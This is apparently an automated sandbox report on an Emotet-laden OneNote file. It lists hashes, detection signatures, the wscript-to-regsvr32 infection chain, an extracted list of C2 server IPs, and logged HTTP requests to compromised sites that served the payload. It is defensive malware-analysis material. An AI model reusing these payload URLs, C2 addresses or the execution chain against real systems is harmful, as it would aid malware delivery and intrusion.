Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8846_0.one

Overview

General Information

Sample Name:8846_0.one
Analysis ID:830446
MD5:b4d388fd8748c7a725541d8a53151a51
SHA1:dc348918f86f3f96b8a508d9ab18788d20ae97d5
SHA256:5697f2ac10e6f1a82497b6b8b19df905f77980ed0644ccd93d2e7bdbfd912241
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Stores files to the Windows start menu directory
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Creates a start menu entry (Start Menu\Programs\Startup)
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • ONENOTE.EXE (PID: 5504 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\8846_0.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 5400 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 1312 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 5836 cmdline: "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 5492 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\APvqE\xukoZN.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • ONENOTEM.EXE (PID: 3996 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5RPyTDgAqAIg=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2tfwADgANAJA="]}
SourceRuleDescriptionAuthorStrings
8846_0.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security
    SourceRuleDescriptionAuthorStrings
    00000004.00000002.886565395.0000000001220000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000003.00000002.390164485.0000000000660000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000004.00000002.886899027.0000000001511000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000004.00000002.886622640.0000000001288000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
            00000001.00000003.410172116.000000000594E000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
            • 0x306:$asp_gen_obf1: "+"
            • 0x336:$asp_gen_obf1: "+"
            • 0x6fa0:$tagasp_short1: <%\x97
            • 0xae82:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
            • 0xafa2:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8
            • 0x79a:$jsp4: public
            • 0xdda:$jsp4: public
            • 0x11a:$asp_input1: request
            • 0x948:$asp_input1: request
            • 0x98a:$asp_input1: request
            • 0xaa0:$asp_input1: request
            • 0x454:$asp_payload11: wscript.shell
            • 0x3c:$asp_multi_payload_one1: createobject
            • 0x12a:$asp_multi_payload_one1: createobject
            • 0x1a2:$asp_multi_payload_one1: createobject
            • 0x1fc:$asp_multi_payload_one1: createobject
            • 0x438:$asp_multi_payload_one1: createobject
            • 0xb9e:$asp_multi_payload_one1: createobject
            • 0xed6:$asp_multi_payload_one1: createobject
            • 0xe7c:$asp_multi_payload_one3: .run
            • 0x3c:$asp_multi_payload_four1: createobject
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            4.2.regsvr32.exe.1220000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.regsvr32.exe.660000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.regsvr32.exe.660000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  4.2.regsvr32.exe.1220000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

                    Malware Analysis System Evasion

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5400, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dll, ProcessId: 1312, ProcessName: regsvr32.exe
                    Timestamp:192.168.2.491.121.146.474970180802404344 03/20/23-11:41:50.938102
                    SID:2404344
                    Source Port:49701
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4164.90.222.65497074432404308 03/20/23-11:42:41.519543
                    SID:2404308
                    Source Port:49707
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4182.162.143.56497044432404312 03/20/23-11:42:12.300659
                    SID:2404312
                    Source Port:49704
                    Destination Port:443
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4104.168.155.1434970880802404302 03/20/23-11:42:46.496776
                    SID:2404302
                    Source Port:49708
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.466.228.32.314970370802404330 03/20/23-11:41:57.297460
                    SID:2404330
                    Source Port:49703
                    Destination Port:7080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4187.63.160.8849705802404314 03/20/23-11:42:28.807595
                    SID:2404314
                    Source Port:49705
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.41.234.2.2324972280802404304 03/20/23-11:44:04.252288
                    SID:2404304
                    Source Port:49722
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4206.189.28.1994972480802404318 03/20/23-11:44:18.257279
                    SID:2404318
                    Source Port:49724
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4167.172.199.1654970680802404310 03/20/23-11:42:35.999408
                    SID:2404310
                    Source Port:49706
                    Destination Port:8080
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 8846_0.oneReversingLabs: Detection: 41%
                    Source: 8846_0.oneVirustotal: Detection: 55%Perma Link
                    Source: https://103.43.75.120:443/ncju/qfgtbvn/Avira URL Cloud: Label: malware
                    Source: https://104.168.155.143:8080/ncju/qfgtbvn/Avira URL Cloud: Label: malware
                    Source: https://103.43.75.120/ncju/qfgtbvn/Avira URL Cloud: Label: malware
                    Source: https://www.gomespontes.com.br/logs/pd/IAvira URL Cloud: Label: malware
                    Source: https://91.207.28.33:8080/ncju/qfgtbvn/Pj?Avira URL Cloud: Label: malware
                    Source: http://wrappixels.com/wp-admin/GdAvira URL Cloud: Label: malware
                    Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0Avira URL Cloud: Label: malware
                    Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
                    Source: https://penshorn.org/admin/Ses8712iGR8du/tMAvira URL Cloud: Label: malware
                    Source: http://ozmeydan.com/cekici/9/Avira URL Cloud: Label: malware
                    Source: https://91.207.28.33:8080/Avira URL Cloud: Label: malware
                    Source: https://66.228.32.31:7080/Avira URL Cloud: Label: malware
                    Source: https://91.207.28.33:8080/ncju/qfgtbvn/BAvira URL Cloud: Label: malware
                    Source: https://107.170.39.149:8080/4Avira URL Cloud: Label: malware
                    Source: https://169.57.156.166:8080/ncju/qfgtbvn/ConnectionCache-ControlAvira URL Cloud: Label: malware
                    Source: https://91.207.28.33:8080/ncju/qfgtbvn/GAvira URL Cloud: Label: malware
                    Source: http://ozmeydan.com/cekici/9/xMAvira URL Cloud: Label: malware
                    Source: https://www.gomespontes.com.br/logs/pd/Avira URL Cloud: Label: malware
                    Source: https://91.207.28.33:8080/ncju/qfgtbvn/IhAvira URL Cloud: Label: malware
                    Source: https://91.207.28.33:8080/mbpAvira URL Cloud: Label: malware
                    Source: https://91.207.28.33:8080/ebxAvira URL Cloud: Label: malware
                    Source: http://softwareulike.com/cWIYxWMPkK/Avira URL Cloud: Label: malware
                    Source: https://91.121.146.47:8080/ncju/qfgtbvn/Avira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Local\Temp\rad69C50.tmp.dllReversingLabs: Detection: 79%
                    Source: C:\Windows\System32\APvqE\xukoZN.dll (copy)ReversingLabs: Detection: 79%
                    Source: 00000004.00000002.886622640.0000000001288000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5RPyTDgAqAIg=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2tfwADgANAJA="]}
                    Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.4:49698 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 31.31.196.172:443 -> 192.168.2.4:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 186.202.153.5:443 -> 192.168.2.4:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 164.90.222.65:443 -> 192.168.2.4:49707 version: TLS 1.2
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,3_2_0000000180008D28

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe

                    Networking

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.65.88.10 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 186.194.240.217 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.207.28.33 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 103.43.75.120 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: bbvoyage.com
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 72.15.201.15 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 206.189.28.199 8080Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 31.31.196.172 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 186.202.153.5 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 107.170.39.149 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 82.223.21.224 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.56.131.28 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 169.57.156.166 8080Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: www.gomespontes.com.br
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 1.234.2.232 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                    Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.4:49707 -> 164.90.222.65:443
                    Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.4:49701 -> 91.121.146.47:8080
                    Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.4:49703 -> 66.228.32.31:7080
                    Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.4:49704 -> 182.162.143.56:443
                    Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.4:49705 -> 187.63.160.88:80
                    Source: TrafficSnort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.4:49706 -> 167.172.199.165:8080
                    Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.4:49708 -> 104.168.155.143:8080
                    Source: TrafficSnort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.4:49722 -> 1.234.2.232:8080
                    Source: TrafficSnort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.4:49724 -> 206.189.28.199:8080
                    Source: Malware configuration extractorIPs: 91.121.146.47:8080
                    Source: Malware configuration extractorIPs: 66.228.32.31:7080
                    Source: Malware configuration extractorIPs: 182.162.143.56:443
                    Source: Malware configuration extractorIPs: 187.63.160.88:80
                    Source: Malware configuration extractorIPs: 167.172.199.165:8080
                    Source: Malware configuration extractorIPs: 164.90.222.65:443
                    Source: Malware configuration extractorIPs: 104.168.155.143:8080
                    Source: Malware configuration extractorIPs: 163.44.196.120:8080
                    Source: Malware configuration extractorIPs: 160.16.142.56:8080
                    Source: Malware configuration extractorIPs: 159.89.202.34:443
                    Source: Malware configuration extractorIPs: 159.65.88.10:8080
                    Source: Malware configuration extractorIPs: 186.194.240.217:443
                    Source: Malware configuration extractorIPs: 149.56.131.28:8080
                    Source: Malware configuration extractorIPs: 72.15.201.15:8080
                    Source: Malware configuration extractorIPs: 1.234.2.232:8080
                    Source: Malware configuration extractorIPs: 82.223.21.224:8080
                    Source: Malware configuration extractorIPs: 206.189.28.199:8080
                    Source: Malware configuration extractorIPs: 169.57.156.166:8080
                    Source: Malware configuration extractorIPs: 107.170.39.149:8080
                    Source: Malware configuration extractorIPs: 103.43.75.120:443
                    Source: Malware configuration extractorIPs: 91.207.28.33:8080
                    Source: Malware configuration extractorIPs: 213.239.212.5:443
                    Source: Malware configuration extractorIPs: 45.235.8.30:8080
                    Source: Malware configuration extractorIPs: 119.59.103.152:8080
                    Source: Malware configuration extractorIPs: 164.68.99.3:8080
                    Source: Malware configuration extractorIPs: 95.217.221.146:8080
                    Source: Malware configuration extractorIPs: 153.126.146.25:7080
                    Source: Malware configuration extractorIPs: 197.242.150.244:8080
                    Source: Malware configuration extractorIPs: 202.129.205.3:8080
                    Source: Malware configuration extractorIPs: 103.132.242.26:8080
                    Source: Malware configuration extractorIPs: 139.59.126.41:443
                    Source: Malware configuration extractorIPs: 110.232.117.186:8080
                    Source: Malware configuration extractorIPs: 183.111.227.137:8080
                    Source: Malware configuration extractorIPs: 5.135.159.50:443
                    Source: Malware configuration extractorIPs: 201.94.166.162:443
                    Source: Malware configuration extractorIPs: 103.75.201.2:443
                    Source: Malware configuration extractorIPs: 79.137.35.198:8080
                    Source: Malware configuration extractorIPs: 172.105.226.75:8080
                    Source: Malware configuration extractorIPs: 94.23.45.86:4143
                    Source: Malware configuration extractorIPs: 115.68.227.76:8080
                    Source: Malware configuration extractorIPs: 153.92.5.27:8080
                    Source: Malware configuration extractorIPs: 167.172.253.162:8080
                    Source: Malware configuration extractorIPs: 188.44.20.25:443
                    Source: Malware configuration extractorIPs: 147.139.166.154:8080
                    Source: Malware configuration extractorIPs: 129.232.188.93:443
                    Source: Malware configuration extractorIPs: 173.212.193.249:8080
                    Source: Malware configuration extractorIPs: 185.4.135.165:8080
                    Source: Malware configuration extractorIPs: 45.176.232.124:443
                    Source: Joe Sandbox ViewASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
                    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                    Source: global trafficHTTP traffic detected: POST /ncju/qfgtbvn/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 164.90.222.65
                    Source: Joe Sandbox ViewIP Address: 110.232.117.186 110.232.117.186
                    Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
                    Source: global trafficHTTP traffic detected: GET /useragreement/ElKHvb4QIQqSrh6Hqm/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbvoyage.com
                    Source: global trafficHTTP traffic detected: GET /logs/pd/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.gomespontes.com.br
                    Source: global trafficTCP traffic: 192.168.2.4:49701 -> 91.121.146.47:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49703 -> 66.228.32.31:7080
                    Source: global trafficTCP traffic: 192.168.2.4:49706 -> 167.172.199.165:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49708 -> 104.168.155.143:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49709 -> 163.44.196.120:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49710 -> 160.16.142.56:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49715 -> 159.65.88.10:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49720 -> 149.56.131.28:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49721 -> 72.15.201.15:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49722 -> 1.234.2.232:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49723 -> 82.223.21.224:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49724 -> 206.189.28.199:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49725 -> 169.57.156.166:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49726 -> 107.170.39.149:8080
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 91.207.28.33:8080
                    Source: unknownNetwork traffic detected: IP country count 18
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 10:41:08 GMTServer: ApacheX-Powered-By: PHP/7.0.33Content-Length: 0Connection: closeContent-Type: text/html;charset=utf-8
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
